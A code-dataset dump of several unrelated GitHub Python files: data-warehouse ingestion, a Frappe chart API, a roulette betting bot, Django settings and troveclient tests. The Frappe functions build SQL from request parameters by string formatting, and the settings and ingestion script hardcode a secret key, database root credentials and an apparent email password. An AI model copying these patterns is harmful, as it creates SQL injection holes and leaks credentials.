dw_engine)\n\n\ndef ingest_fact_order_item(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"fact_order_item\"\n\n results = source_connection.execute(\"\"\"\n SELECT \n order_item.order_item_id as original_id,\n orders.order_id as order_id,\n orders.customer_id as customer_original_id,\n orders.order_status as status,\n \n DATE_FORMAT(orders.order_purchase_timestamp, \"%%Y/%%m/%%d\") as purchase_timestamp_str,\n DATE_FORMAT(orders.order_approved_at, \"%%Y/%%m/%%d\") as approved_at_str,\n DATE_FORMAT(orders.order_delivered_carrier_date, \"%%Y/%%m/%%d\") as delivered_carrier_date_str,\n DATE_FORMAT(orders.order_delivered_customer_date, \"%%Y/%%m/%%d\") as delivered_customer_date_str,\n DATE_FORMAT(orders.order_estimated_delivery_date, \"%%Y/%%m/%%d\") as estimated_delivery_date_str,\n \n order_item.price as price,\n order_item.product_id as product_original_id,\n order_item.seller_id as seller_original_id\n FROM orders\n INNER JOIN order_item on order_item.order_id = orders.order_id;\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n dim_date = pd.read_sql_table(\"dim_date\", con=dw_engine)\n dim_customer = pd.read_sql_table(\"dim_customer\", con=dw_engine)\n dim_product = pd.read_sql_table(\"dim_product\", con=dw_engine)\n dim_seller = pd.read_sql_table(\"dim_seller\", con=dw_engine)\n dim_order_payment = pd.read_sql_table(\"dim_order_payment\", con=dw_engine)\n\n data = pd.merge(data, dim_customer, left_on=['customer_original_id'], right_on=['original_id'])\n data.rename({'id': 'customer_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_product, left_on=['product_original_id'], right_on=['original_id'])\n data.rename({'id': 'product_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_seller, left_on=['seller_original_id'], right_on=['original_id'])\n data.rename({'id': 'seller_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['purchase_timestamp_str'], right_on=['str'])\n data.rename({'id': 'purchase_timestamp_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['approved_at_str'], right_on=['str']) #\n data.rename({'id': 'approved_at_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['delivered_carrier_date_str'], right_on=['str']) #\n data.rename({'id': 'delivered_carrier_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['delivered_customer_date_str'], right_on=['str']) #\n data.rename({'id': 'delivered_customer_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['estimated_delivery_date_str'], right_on=['str'])\n data.rename({'id': 'estimated_delivery_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_order_payment, how='left', on='order_id') #\n data.rename({'id': 'order_payment_id'}, axis=1, inplace=True)\n\n data.rename({'original_id_x': 'original_id'}, axis=1, inplace=True)\n fact_order_item = data[\n ['order_id', 'product_id', 'seller_id', 'customer_id', 'original_id', 'order_payment_id', 'price', 'status',\n 'purchase_timestamp_date_id', 'approved_at_date_id', 'delivered_carrier_date_id', 'delivered_customer_date_id',\n 'estimated_delivery_date_id']].copy()\n fact_order_item.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_facts():\n source_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/sourceDB\", echo=False)\n dw_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/dw\", echo=False)\n\n ingest_fact_order_item(source_engine, dw_engine)\n\n\ndef delete_all():\n dw_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/dw\", echo=False)\n dw_connection = dw_engine.connect()\n dw_connection.execute(\"DELETE FROM fact_order_item;\")\n dw_connection.execute(\"DELETE FROM dim_customer;\")\n dw_connection.execute(\"DELETE FROM dim_seller;\")\n dw_connection.execute(\"DELETE FROM dim_payment;\")\n dw_connection.execute(\"DELETE FROM dim_order_payment;\")\n dw_connection.execute(\"DELETE FROM dim_product;\")\n dw_connection.execute(\"DELETE FROM dim_local;\")\n dw_connection.execute(\"DELETE FROM dim_date;\")\n\n\nif __name__ == \"__main__\":\n delete_all()\n ingest_dims()\n ingest_facts()\n","repo_name":"CaioSGoncalves/ECommerceDW","sub_path":"1_dw_ingestion.py","file_name":"1_dw_ingestion.py","file_ext":"py","file_size_in_byte":11225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"18618206368","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe import _\nimport frappe.defaults\nimport frappe.permissions\nfrom frappe.core.doctype.user.user import get_system_users\nfrom frappe.utils.csvutils import UnicodeWriter, read_csv_content_from_uploaded_file\nfrom frappe.defaults import clear_default\nimport datetime\n\ndef formated_date(date_str):\n\treturn datetime.datetime.strptime(date_str , '%d-%m-%Y').strftime('%Y-%m-%d')\n\t \n@frappe.whitelist()\ndef get_data(from_date=None,to_date=None,currency=None):\n\tfrappe.errprint(currency)\n\tdata_dict = {'cols':'name ,net_total', 'tab':'`tabSales Order`', 'cond_col': 'delivery_date','cncy':'currency'}\n\tmake_cond(data_dict, from_date, to_date,currency)\t\t\t\t\n\treturn{\n\t\t\"sales_order_total\": make_query(data_dict)\n\t}\n\t\n@frappe.whitelist()\ndef get_jv_data(from_date=None,to_date=None):\n\tdata_dict = {'cols':'name,total_credit', 'tab':'`tabJournal Voucher`', 'cond_col': 'posting_date','cncy':'currency'}\n\tmake_cond(data_dict, from_date, to_date)\t\t\t\t\n\treturn{\n\t\t\"order_total\": make_query(data_dict)\n\t}\n\t\n\ndef make_cond(data_dict, from_date=None,to_date=None,currency=None):\n\t\n\tif from_date and to_date and currency:\n\t\tfrappe.errprint(\"in the else\")\n\t\tdata_dict['cond'] = \"\"\" where %(cond_col)s between '%(from_date)s' and '%(to_date)s' and %(cncy)s = '%(currency)s'\n\t\t\t\"\"\"%{'cond_col': data_dict.get('cond_col'), 'from_date': formated_date(from_date),\n\t\t\t\t\t'to_date': formated_date(to_date),'currency':currency, 'cncy':data_dict.get('cncy')}\n\n\telif from_date and to_date:\n\t\tdata_dict['cond'] = \"\"\" where %(cond_col)s between '%(from_date)s' and '%(to_date)s' \n\t\t\t\"\"\"%{'cond_col': data_dict.get('cond_col'), 'from_date': formated_date(from_date),\n\t\t\t\t\t'to_date': formated_date(to_date)}\n\telse:\n\t\tdata_dict['cond'] = ' '\n\n\ndef make_query(data_dict):\n\tstmt=\"select %(cols)s from %(tab)s %(cond)s\"%data_dict\n\t\n\treturn frappe.db.sql(\"select %(cols)s from %(tab)s %(cond)s\"%data_dict,debug=1)\n\n@frappe.whitelist()\ndef get_activities():\n\tdbname=frappe.db.sql(\"\"\"select site_name from `tabSubAdmin Info` where active=1\"\"\",as_dict=1)\n\tlst=[]\n\tqry_srt='select subject,site_name from('\n\tfor key in dbname:\n\t\ttemp =key['site_name']\n\t\tqry=\"SELECT subject,creation,'%s' as site_name FROM \"%(temp)\n\t\tif temp :\n\t\t\tqry+=temp+'.tabFeed'\n\t\t\tlst.append(qry)\n\tfin_qry=' UNION '.join(lst)\n\tqry=qry_srt+fin_qry+\" where doc_name='Administrator')foo ORDER BY creation DESC limit 5\"\n\tact_details=frappe.db.sql(fin_qry,as_dict=1,debug=1)\n\treturn act_details\n\n\n@frappe.whitelist()\ndef get_data_newsale(from_date=None,to_date=None):\n\tif from_date and to_date:\n\t\tstr1=\"select date_format(creation,'%M') as month,count(*) as lead from `tabLead` where date(creation) between '\"+formated_date(from_date)+\"' and '\"+formated_date(to_date)+\"' order by month\"\n\t\tsales_details=frappe.db.sql(str1,debug=1)\n\t\treturn{\n\t\t\"order_total\": sales_details\n\t }\n\telse:\n\t\tstr1=\"select date_format(creation,'%M') as month,count(*) as lead from `tabLead` order by month\"\n\t\tsales_details=frappe.db.sql(str1,debug=1)\n\t\treturn{\n\t\t\"order_total\": sales_details\n\t }\n\n@frappe.whitelist()\ndef get_prospect(from_date=None,to_date=None):\n\tfrappe.errprint(\"in the pro py\")\n\tfrappe.errprint(from_date)\n\tfrappe.errprint(to_date)\n\n\tif from_date and to_date:\n\t\tstr2=\"select name,sum(target_amount*percentage_allocation/100)as target_amount from (SELECT sp.name,bd.fiscal_year,bdd.month,bdd.percentage_allocation,(select sum(td.target_amount) from `tabTarget Detail` td where td.parent=sp.name and td.fiscal_year=bd.fiscal_year) as target_amount,(case when bdd.month in('January','February','March') then SUBSTRING_INDEX(SUBSTRING_INDEX(bd.fiscal_year, '-', 1), ' ', -1) else SUBSTRING_INDEX(SUBSTRING_INDEX(bd.fiscal_year, '-', -1), ' ', -1) end) as year FROM `tabSales Person` sp,`tabBudget Distribution` bd,`tabBudget Distribution Detail` bdd where sp.distribution_id=bd.name and bdd.parent=bd.name )foo where date_format(str_to_date(concat('01-',month,'-',year),'%d-%M-%Y'),'%y-%m') between date_format(date('\"+formated_date(from_date)+\"'),'%y-%m') and date_format(date('\"+formated_date(to_date)+\"'),'%y-%m') group by name\"\n\t\tfrappe.errprint(str2)\n\t\tprospect_details=frappe.db.sql(str2,debug=1)\n\t\tfrappe.errprint(prospect_details)\n\t\treturn{\n\t\t\"order_total\": prospect_details\n\t }\n\telse:\n\t\tstr1=\"select date_format(creation,'%M') as month,count(*) as lead from `tabLead` order by month\"\n\t\tsales_details=frappe.db.sql(str1,debug=1)\n\t\treturn{\n\t\t\"order_total\": sales_details\n\t }\t \n\n\n@frappe.whitelist()\ndef get_subscription(from_date=None,to_date=None):\n\tfrappe.errprint(\"in the get_subscription py\")\n\t#frappe.errprint(from_date)\n\t#frappe.errprint(to_date)\n\t#frappe.errprint(\"calling \")\n\tif from_date and to_date:\n\t\tstr2=\"select name,EXTRACT(month FROM expiry_date) as expiry_date from `tabSite Master` where expiry_date between '2013-12-25' and '2015-12-25'\"\n\t\t#frappe.errprint(str2)\n\t\tsubscription_details=frappe.db.sql(str2,as_list=1)\n\t\tfrappe.errprint(subscription_details)\n\t\treturn{\n\t\t\"order_total\": subscription_details\n\t }\n\telse:\n\t\tstr2=\"select name,EXTRACT(month FROM expiry_date) as expiry_date from `tabSite Master` where expiry_date is not null\"\n\t\t#frappe.errprint(str2)\n\t\tsubscription_details=frappe.db.sql(str2,as_list=1)\n\t\tfrappe.errprint(subscription_details)\n\t\treturn{\n\t\t\"order_total\": subscription_details\n\t }\n\n\t\t \n\n","repo_name":"rohitw1991/smarttailorfrappe","sub_path":"frappe/core/page/graphical_chart/graphical_chart.py","file_name":"graphical_chart.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"13377575425","text":"import time\r\nimport json\r\nfrom datetime import datetime\r\nimport requests\r\n\r\n\r\ndef get_blaze_data(url, save_file=True):\r\n r = requests.get(url)\r\n\r\n if save_file:\r\n save_data_to_file(r.text)\r\n return json.loads(r.text)\r\n\r\n# função que faz a requisição para o horário atual\r\n\r\n\r\ndef make_request(start_date=\"2023-04-23\", end_date=\"2023-04-24\", save_file=True):\r\n cur_hour = get_current_time_hour()\r\n print(cur_hour)\r\n url = f\"https://blaze.com/api/roulette_games/history?startDate={start_date}T{cur_hour}.000Z&endDate={end_date}T{cur_hour}.000Z&page=1\"\r\n\r\n r = requests.get(url)\r\n if save_file:\r\n save_data_to_file(r.text)\r\n return json.loads(r.text)\r\n\r\n\r\ndef save_data_to_file(data):\r\n with open(\"result.json\", \"w\") as f:\r\n f.write(data)\r\n\r\n\r\ndef get_current_time_hour():\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n return current_time\r\n\r\n\r\ndef get_total_pages(data):\r\n return data[\"totalPages\"]\r\n\r\n\r\ndef get_only_result_data(data):\r\n result = []\r\n for i, v in enumerate(data[\"records\"]):\r\n val = v[\"color\"]\r\n if i < 5:\r\n result.append(val)\r\n return result\r\n\r\n\r\ndef estrategia(result_array):\r\n color_count = 0\r\n last = None\r\n print(result_array)\r\n for color in result_array:\r\n if last == None:\r\n last = color\r\n if color == last:\r\n color_count += 1\r\n else:\r\n return color_count\r\n return color_count\r\n\r\n\r\nif __name__ == \"__main__\":\r\n while True:\r\n data = make_request()\r\n result = get_only_result_data(data)\r\n r_est = estrategia(result)\r\n if r_est == 5:\r\n print(\"5 seguidos da mesma cor. Entrada válida!\")\r\n if result[0] == \"red\":\r\n print(\"Aposta: black\")\r\n else:\r\n print(\"Aposta: red\")\r\n elif r_est == 3:\r\n print(\"3 seguidos. Aposta próxima!\")\r\n if result[0] == \"red\":\r\n print(\"Aposta: black\")\r\n else:\r\n print(\"Aposta: red\")\r\n time.sleep(27)\r\n","repo_name":"Eduard0MS/boot","sub_path":"teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"9815856627","text":"import csv \r\nfrom Coleccion import Coleccion\r\nfrom EContratado import EContratado\r\n \r\nif __name__=='__main__':\r\n \r\n cant=int(input(\"ingrese la cantidad de empleados a registrar \"))\r\n \r\n ManejaEmpleados=Coleccion(cant)\r\n ManejaEmpleados.cargaEmpleados()\r\n \r\n print(\"1. Registrar Horas\")\r\n print(\"2. Total de Tareas\")\r\n print(\"3. Ayuda Economica\")\r\n print(\"4. Calcular Sueldo\")\r\n \r\n op=int(input(\"ingrese la opcion a realizar: \"))\r\n \r\n while op != 0:\r\n if op == 1:\r\n dni=int(input(\"ingrese dni del empleado \"))\r\n horas=int(input(\"ingrese la cantidad de horas trabajadas: \"))\r\n empleado=ManejaEmpleados.buscaDNI()\r\n if empleado != False and isinstance(empleado,EContratado):\r\n empleado.incrementoHoras(horas) \r\n elif op == 2:\r\n tarea=input(\"ingrese la tarea a buscar: \")\r\n fecha=input(\"ingrese fecha actual: \")\r\n EmpleadoExterno=ManejaEmpleados.buscaTarea(tarea)\r\n confirmacion=ManejaEmpleados.verificaFecha(fecha,EmpleadoExterno)\r\n if EmpleadoExterno != False and confirmacion ==True:\r\n EmpleadoExterno.montoPagar()\r\n elif op == 3:\r\n ManejaEmpleados.ayudaSolidaria()\r\n elif op == 4:\r\n ManejaEmpleados.mostrarSueldo()\r\n else:\r\n print(\"opcion incorrecta. \")\r\n \r\n print(\"1. Registrar Horas\")\r\n print(\"2. Total de Tareas\")\r\n print(\"3. Ayuda Economica\")\r\n print(\"4. Calcular Sueldo\") \r\n \r\n op=int(input(\"ingrese la opcion a realizar: \"))\r\n \r\n \r\n ","repo_name":"Ignacio43/Ejercicio-4.U3","sub_path":"Ejercicio 4.U3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"37577350577","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDjango settings for frikr project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'wd9c_x9m4tz3w$l^m6$+wo+mfr&u*!em&@7)jjy&4e8=)qg^6m'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'photos',\n 'rest_framework'\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'frikr.urls'\n\nWSGI_APPLICATION = 'frikr.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'es-es'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nLOGIN_URL = '/login'\n\n# REST Framework settings\nREST_FRAMEWORK = {\n 'PAGINATE_BY': 3, #indica los elemantos a mostrar por página\n 'PAGINATE_BY_PARAM': 'page_size', # permite definir al cliente el tamaño de paginación\n 'MAX_PAGINATE_BY': 10, # máximo número de items por página permitidos\n 'DEFAULT_RENDERER_CLASSES': (\n 'rest_framework.renderers.JSONRenderer',\n 'rest_framework.renderers.XMLRenderer',\n 'rest_framework.renderers.BrowsableAPIRenderer',\n #'rest_framework.renderers.YAMLRenderer',\n )\n}\n\n\n# Configuración de archivos media\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nMEDIA_URL = '/media/'\n\n\n# Configuración para depurar e-mail\n# python -m smtpd -n -c DebuggingServer localhost:1025\nEMAIL_HOST = '127.0.0.1'\nEMAIL_PORT = 1025\n\n# EMAIL_USE_TLS = True\n# EMAIL_HOST = 'smtp.gmail.com'\n# EMAIL_HOST_USER = 'antonio.jimenez2@gmail.com'\n# EMAIL_HOST_PASSWORD = 'No@violence13cig3cx6h'\n# EMAIL_PORT = 587\n","repo_name":"antjimar/Friker","sub_path":"frikr/frikr/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"10242353439","text":"N,M=map(int,input().split())\nc=[[False]*(N+1) for _ in range(N+1)]\n\nfor i in range(M):\n u,m=map(int,input().split())\n c[u][m]=True\n c[m][u]=True\n \nans=0 \nfor i in range(1,N+1):\n for j in range(i+1,N+1):\n for k in range(j+1,N+1):\n if c[i][j] and c[j][k] and c[k][i]:\n ans+=1\n \nprint(ans)\n","repo_name":"gomatofu/atcoder","sub_path":"submissions/abc262/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"1706579864","text":"\"\"\"\nClass Fitness to treat the fitness as the inverse of the route distance. We want to minimize route distance, so a larger\nfitness score is better.\n\"\"\"\n\n\nclass Fitness:\n def __init__(self, route):\n self.route = route\n self.distance = 0\n self.fitness = 0.0\n\n def route_distance(self):\n if self.distance == 0:\n path_distance = 0\n for i in range(0, len(self.route)):\n from_city = self.route[i]\n if (i + 1) < len(self.route):\n to_city = self.route[i + 1]\n else:\n to_city = self.route[0]\n path_distance += from_city.distance(to_city)\n self.distance = path_distance\n return self.distance\n\n def route_fitness(self):\n if self.fitness == 0:\n self.fitness = 1 / float(self.route_distance())\n return self.fitness\n","repo_name":"NamizataS/Biomimetics_TPs","sub_path":"TP3/Fitness.py","file_name":"Fitness.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"72611770671","text":"import contextlib\nimport os\nfrom unittest import mock\n\nimport testtools\n\nfrom troveclient.apiclient import exceptions\nfrom troveclient import base\nfrom troveclient import common\nfrom troveclient import utils\n\n\"\"\"\nUnit tests for base.py\n\"\"\"\n\nUUID = '8e8ec658-c7b0-4243-bdf8-6f7f2952c0d0'\n\n\ndef obj_class(self, res, loaded=True):\n return res\n\n\nclass BaseTest(testtools.TestCase):\n def test_getid(self):\n obj = \"test\"\n r = base.getid(obj)\n self.assertEqual(obj, r)\n\n test_id = \"test_id\"\n obj = mock.Mock()\n obj.id = test_id\n r = base.getid(obj)\n self.assertEqual(test_id, r)\n\n\nclass ManagerTest(testtools.TestCase):\n def setUp(self):\n super(ManagerTest, self).setUp()\n self.orig__init = base.Manager.__init__\n base.Manager.__init__ = mock.Mock(return_value=None)\n self.orig_os_makedirs = os.makedirs\n\n def tearDown(self):\n super(ManagerTest, self).tearDown()\n base.Manager.__init__ = self.orig__init\n os.makedirs = self.orig_os_makedirs\n\n def test___init__(self):\n api = mock.Mock()\n base.Manager.__init__ = self.orig__init\n manager = base.Manager(api)\n self.assertEqual(api, manager.api)\n\n def test_completion_cache(self):\n manager = base.Manager()\n\n # handling exceptions\n mode = \"w\"\n cache_type = \"unittest\"\n obj_class = mock.Mock\n with manager.completion_cache(cache_type, obj_class, mode):\n pass\n\n os.makedirs = mock.Mock(side_effect=OSError)\n with manager.completion_cache(cache_type, obj_class, mode):\n pass\n\n def test_write_to_completion_cache(self):\n manager = base.Manager()\n\n # no cache object, nothing should happen\n manager.write_to_completion_cache(\"non-exist\", \"val\")\n manager._mock_cache = mock.Mock()\n manager._mock_cache.write = mock.Mock(return_value=None)\n manager.write_to_completion_cache(\"mock\", \"val\")\n self.assertEqual(1, manager._mock_cache.write.call_count)\n\n def _get_mock(self):\n manager = base.Manager()\n manager.api = mock.Mock()\n manager.api.client = mock.Mock()\n\n def side_effect_func(self, body, loaded=True):\n return body\n\n manager.resource_class = mock.Mock(side_effect=side_effect_func)\n return manager\n\n def test__get_with_response_key_none(self):\n manager = self._get_mock()\n url_ = \"test-url\"\n body_ = \"test-body\"\n resp_ = \"test-resp\"\n manager.api.client.get = mock.Mock(return_value=(resp_, body_))\n r = manager._get(url=url_, response_key=None)\n self.assertEqual(body_, r)\n\n def test__get_with_response_key(self):\n manager = self._get_mock()\n response_key = \"response_key\"\n body_ = {response_key: \"test-resp-key-body\"}\n url_ = \"test_url_get\"\n manager.api.client.get = mock.Mock(return_value=(url_, body_))\n r = manager._get(url=url_, response_key=response_key)\n self.assertEqual(body_[response_key], r)\n\n def test__create(self):\n manager = base.Manager()\n manager.api = mock.Mock()\n manager.api.client = mock.Mock()\n\n response_key = \"response_key\"\n data_ = \"test-data\"\n body_ = {response_key: data_}\n url_ = \"test_url_post\"\n manager.api.client.post = mock.Mock(return_value=(url_, body_))\n\n return_raw = True\n r = manager._create(url_, body_, response_key, return_raw)\n self.assertEqual(data_, r)\n\n return_raw = False\n\n @contextlib.contextmanager\n def completion_cache_mock(*arg, **kwargs):\n yield\n\n mockl = mock.Mock()\n mockl.side_effect = completion_cache_mock\n manager.completion_cache = mockl\n\n manager.resource_class = mock.Mock(return_value=\"test-class\")\n r = manager._create(url_, body_, response_key, return_raw)\n self.assertEqual(\"test-class\", r)\n\n def get_mock_mng_api_client(self):\n manager = base.Manager()\n manager.api = mock.Mock()\n manager.api.client = mock.Mock()\n return manager\n\n def test__delete(self):\n resp_ = \"test-resp\"\n body_ = \"test-body\"\n\n manager = self.get_mock_mng_api_client()\n manager.api.client.delete = mock.Mock(return_value=(resp_, body_))\n # _delete just calls api.client.delete, and does nothing\n # the correctness should be tested in api class\n manager._delete(\"test-url\")\n pass\n\n def test__update(self):\n resp_ = \"test-resp\"\n body_ = \"test-body\"\n\n manager = self.get_mock_mng_api_client()\n manager.api.client.put = mock.Mock(return_value=(resp_, body_))\n body = manager._update(\"test-url\", body_)\n self.assertEqual(body_, body)\n\n\nclass ManagerListTest(ManagerTest):\n def setUp(self):\n super(ManagerListTest, self).setUp()\n\n @contextlib.contextmanager\n def completion_cache_mock(*arg, **kwargs):\n yield\n\n self.manager = base.Manager()\n self.manager.api = mock.Mock()\n self.manager.api.client = mock.Mock()\n\n self.response_key = \"response_key\"\n self.data_p = [\"p1\", \"p2\"]\n self.body_p = {self.response_key: self.data_p}\n self.url_p = \"test_url_post\"\n self.manager.api.client.post = mock.Mock(\n return_value=(self.url_p, self.body_p)\n )\n self.data_g = [\"g1\", \"g2\", \"g3\"]\n self.body_g = {self.response_key: self.data_g}\n self.url_g = \"test_url_get\"\n self.manager.api.client.get = mock.Mock(\n return_value=(self.url_g, self.body_g)\n )\n\n mockl = mock.Mock()\n mockl.side_effect = completion_cache_mock\n self.manager.completion_cache = mockl\n\n def tearDown(self):\n super(ManagerListTest, self).tearDown()\n\n def test_list_with_body_none(self):\n body = None\n li = self.manager._list(\"url\", self.response_key, obj_class, body)\n self.assertEqual(len(self.data_g), len(li))\n for i in range(0, len(li)):\n self.assertEqual(self.data_g[i], li[i])\n\n def test_list_body_not_none(self):\n body = \"something\"\n li = self.manager._list(\"url\", self.response_key, obj_class, body)\n self.assertEqual(len(self.data_p), len(li))\n for i in range(0, len(li)):\n self.assertEqual(self.data_p[i], li[i])\n\n def test_list_key_mapping(self):\n data_ = {\"values\": [\"p1\", \"p2\"]}\n body_ = {self.response_key: data_}\n url_ = \"test_url_post\"\n self.manager.api.client.post = mock.Mock(return_value=(url_, body_))\n li = self.manager._list(\"url\", self.response_key,\n obj_class, \"something\")\n data = data_[\"values\"]\n self.assertEqual(len(data), len(li))\n for i in range(0, len(li)):\n self.assertEqual(data[i], li[i])\n\n def test_list_without_key_mapping(self):\n data_ = {\"v1\": \"1\", \"v2\": \"2\"}\n body_ = {self.response_key: data_}\n url_ = \"test_url_post\"\n self.manager.api.client.post = mock.Mock(return_value=(url_, body_))\n li = self.manager._list(\"url\", self.response_key,\n obj_class, \"something\")\n self.assertEqual(len(data_), len(li))\n\n\nclass MangerPaginationTests(ManagerTest):\n\n def setUp(self):\n super(MangerPaginationTests, self).setUp()\n self.manager = base.Manager()\n self.manager.api = mock.Mock()\n self.manager.api.client = mock.Mock()\n self.manager.resource_class = base.Resource\n\n self.response_key = \"response_key\"\n self.data = [{\"foo\": \"p1\"}, {\"foo\": \"p2\"}]\n self.next_data = [{\"foo\": \"p3\"}, {\"foo\": \"p4\"}]\n self.marker = 'test-marker'\n self.limit = '20'\n self.url = \"http://test_url\"\n self.next_url = '%s?marker=%s&limit=%s' % (self.url, self.marker,\n self.limit)\n self.links = [{'href': self.next_url, 'rel': 'next'}]\n self.body = {\n self.response_key: self.data,\n 'links': self.links\n }\n self.next_body = {self.response_key: self.next_data}\n\n def side_effect(url):\n if url == self.url:\n return None, self.body\n # In python 3 the order in the dictionary is not constant\n # between runs. So we cant rely on the URL params to be\n # in the same order\n if ('marker=%s' % self.marker in url and\n 'limit=%s' % self.limit in url):\n self.next_url = url\n return None, self.next_body\n\n self.manager.api.client.get = mock.Mock(side_effect=side_effect)\n\n def tearDown(self):\n super(MangerPaginationTests, self).tearDown()\n\n def test_pagination(self):\n resp = self.manager._paginated(self.url, self.response_key)\n self.manager.api.client.get.assert_called_with(self.url)\n self.assertEqual('p1', resp[0].foo)\n self.assertEqual('p2', resp[1].foo)\n self.assertEqual(self.marker, resp.next)\n self.assertEqual(self.links, resp.links)\n self.assertIsInstance(resp, common.Paginated)\n\n def test_pagination_next(self):\n resp = self.manager._paginated(self.url, self.response_key,\n limit=self.limit, marker=self.marker)\n self.manager.api.client.get.assert_called_with(self.next_url)\n self.assertEqual('p3', resp[0].foo)\n self.assertEqual('p4', resp[1].foo)\n self.assertIsNone(resp.next)\n self.assertEqual([], resp.links)\n self.assertIsInstance(resp, common.Paginated)\n\n def test_pagination_error(self):\n self.manager.api.client.get = mock.Mock(return_value=(None, None))\n self.assertRaises(Exception, self.manager._paginated,\n self.url, self.response_key)\n\n\nclass FakeResource(object):\n def __init__(self, _id, properties):\n self.id = _id\n try:\n self.name = properties['name']\n except KeyError:\n pass\n try:\n self.display_name = properties['display_name']\n except KeyError:\n pass\n\n\nclass FakeManager(base.ManagerWithFind):\n resource_class = FakeResource\n\n resources = [\n FakeResource('1234', {'name': 'entity_one'}),\n FakeResource(UUID, {'name': 'entity_two'}),\n FakeResource('4242', {'display_name': 'entity_three'}),\n FakeResource('5678', {'name': '9876'})\n ]\n\n def get(self, resource_id):\n for resource in self.resources:\n if resource.id == str(resource_id):\n return resource\n raise exceptions.NotFound(resource_id)\n\n def list(self):\n return self.resources\n\n\nclass FindResourceTestCase(testtools.TestCase):\n def setUp(self):\n super(FindResourceTestCase, self).setUp()\n self.manager = FakeManager(None)\n\n def test_find_none(self):\n self.assertRaises(exceptions.CommandError,\n utils.find_resource,\n self.manager,\n 'asdf')\n\n def test_find_by_integer_id(self):\n output = utils.find_resource(self.manager, 1234)\n self.assertEqual(self.manager.get('1234'), output)\n\n def test_find_by_str_id(self):\n output = utils.find_resource(self.manager, '1234')\n self.assertEqual(self.manager.get('1234'), output)\n\n def test_find_by_uuid(self):\n output = utils.find_resource(self.manager, UUID)\n self.assertEqual(self.manager.get(UUID), output)\n\n def test_find_by_str_name(self):\n output = utils.find_resource(self.manager, 'entity_one')\n self.assertEqual(self.manager.get('1234'), output)\n\n def test_find_by_str_displayname(self):\n output = utils.find_resource(self.manager, 'entity_three')\n self.assertEqual(self.manager.get('4242'), output)\n\n def test_find_by_int_name(self):\n output = utils.find_resource(self.manager, 9876)\n self.assertEqual(self.manager.get('5678'), output)\n\n\nclass ResourceTest(testtools.TestCase):\n def setUp(self):\n super(ResourceTest, self).setUp()\n self.orig___init__ = base.Resource.__init__\n\n def tearDown(self):\n super(ResourceTest, self).tearDown()\n base.Resource.__init__ = self.orig___init__\n\n def test___init__(self):\n manager = mock.Mock()\n 